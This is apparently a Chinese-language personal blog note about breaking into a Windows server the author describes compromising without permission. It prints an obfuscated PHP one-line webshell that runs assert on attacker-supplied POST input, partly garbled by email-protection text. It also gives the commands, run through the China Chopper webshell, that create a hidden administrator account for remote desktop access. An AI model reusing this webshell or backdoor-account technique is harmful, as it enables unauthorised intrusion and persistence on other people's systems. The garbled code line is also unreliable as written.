渗透笔记①

一次小型渗透笔记, 嘘~图

由于某些原因,又日了台某个地方的win服务器. 拿到了webshell以后,想搞到图形界面,上次搞过,不过忘了,现在又要查,因此记录下来,做备忘….

找到一个较猥琐的一句话..

1
2
3
4
<?php
($_[email protected]$_GET['url'])[email protected]$_($_POST['uurrll']);
//url要为assert
?>

其实我也很水…拿到webshell后也不知道该干嘛..只知道win可以想办法搞到图形界面…linux的就不会了..


win 图形界面的获取

思路很简单..就是通过远程连接,,重要的是获得管理员账号..不过获得了webshell 并不等于知道了管理员账号密码…不过可以通过webshell再次创建一个管理员账号,,步骤如下…

通过菜刀,可以获得虚拟终端…不得不说..菜刀真是个webshell的神器..

1
2
3
C:\> net user root 123456 /add     #创建一个用户名为root密码为123456的账号 

C:\> net localgroup administrators root /add #将root用户添加到administrators用户组

之后就可以通过这个新建的用户远程登录服务器..

通过之类的渗透, 发现在这类情况下linux服务器的优势, 一般获得的webshell, 在linux大部分都属于普通权限, 基本上只有通过0day之类的提权漏洞获得root权限, 而win权限处理的却不是很好…